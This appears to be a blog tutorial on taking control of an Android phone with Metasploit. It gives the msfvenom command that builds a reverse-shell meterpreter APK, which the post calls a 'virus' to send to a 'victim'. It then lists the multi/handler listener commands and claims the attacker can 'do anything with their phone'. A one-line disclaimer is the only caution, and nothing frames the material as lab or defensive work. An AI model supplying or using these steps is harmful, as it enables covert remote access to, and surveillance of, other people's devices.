If you use Kali Linux on a daily base operating system. You probably, know about Metasploit – Framework it is one of the most used tools of all time. We suggest this tool because it is very simple to use and came preinstalled in all the Linux machines. But it is also very dangerous! So we will show you how to hack an android mobile with this tool but you can hack any operating system with this by making their payloads 😉, So let’s Start!

Note: Don’t use this tool for bad purposes! We are not responsible for anything you do.

So first, open the terminal of your Linux operating system. For this tool, we will directly open the terminal because it is already installed in the system so we don’t have to clone this.

After opening the terminal, we have to make a payload file and you can also call it a virus file which you will send to the victim. If you made this android virus file for one time so you can always use this file for hacking other mobiles. So type the command as shown in the image or you can copy the command from below.

Note: Your virus will be saved in your Home directory.

Command – msfvenom -p android/meterpreter/reverse_tcp lhost=(YOUR IP) lport=(YOUR PORT) R > payload.apk

In the payload command for “Lhost”, you have to type your IP and in “Lport” you can type any port you want then you have to write the payload name which should be in (.apk) format as shown in the above image.

For copying your IP address you have to type this command ( ifconfig ) and you can copy your IP address. Copy the IP address from where we copy our IP. Look at the image below!

After making the virus you have to run the Metasploit-Framework by typing the command ( msfconsole ) in terminal. After typing the command your metasploit will start opening.

Now you have to type some commands like we do to start the tool and image of them will be shown on above of their commands.

  • Command 1 – use exploit/multi/handler

-> To start the Multi Handler.

  • Command 2 – set payload android/meterpreter/reverse_tcp

-> Starts the android payload to execute (.apk) file.

  • Command 3 – set lhost (YOUR IP)
  • Command 4 – set lport (YOUR PORT NUMBER)
  • Command 5 – exploit

-> Set lhost and lport then exploit the program. Exploit is used to start the virus.

Now after running the exploit command, you have to send the virus to your victim and when he/she opens it you will receive the connection of the system on which the virus has been opened.

Now you can do anything with their phone by typing some commands only.

Tips: If you type ( help ) command you can see all the commands which you can run on the victim’s phone!

If you have any problem with our blog so you can comment to us we will try to fix it.

0 Shares:
2 comments
Leave a Reply

Your email address will not be published. Required fields are marked *

You May Also Like